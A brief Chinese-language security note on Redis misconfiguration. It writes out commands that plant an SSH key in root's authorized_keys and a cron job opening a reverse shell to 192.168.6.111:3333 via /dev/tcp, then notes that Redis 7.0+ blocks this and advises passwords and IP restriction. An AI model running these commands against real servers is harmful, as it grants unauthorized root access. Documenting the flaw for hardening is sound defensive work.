redis安全问题记录

redis安全问题记录

redis-cli -h 127.0.0.1 -p 8002
set xxx "\r\n ssh-rsa AAAABdfodf5sRBMfQE= root@test \r\n"
config set dir /root/.ssh
config set dbfilename authorized_keys
save


写入反弹shell
redis-cli -h 192.168.6.111
set xxx "\r\n*/**** /bin/bash -i >&/dev/tcp/192.168.6.111/3333 0>&1\r\n"
config set dir /var/spool/cron
config set dbfilename root
save


没问题版本redis7.0 以上
config set dir /root/.ssh
(error) ERR CONFIG SET failed (possibly related to argument 'dir') - can't set protected config

redis配置这个也不行
protected-mode yes

安全建议
redis要设置密码
redis最好限制IP访问，只能内网访问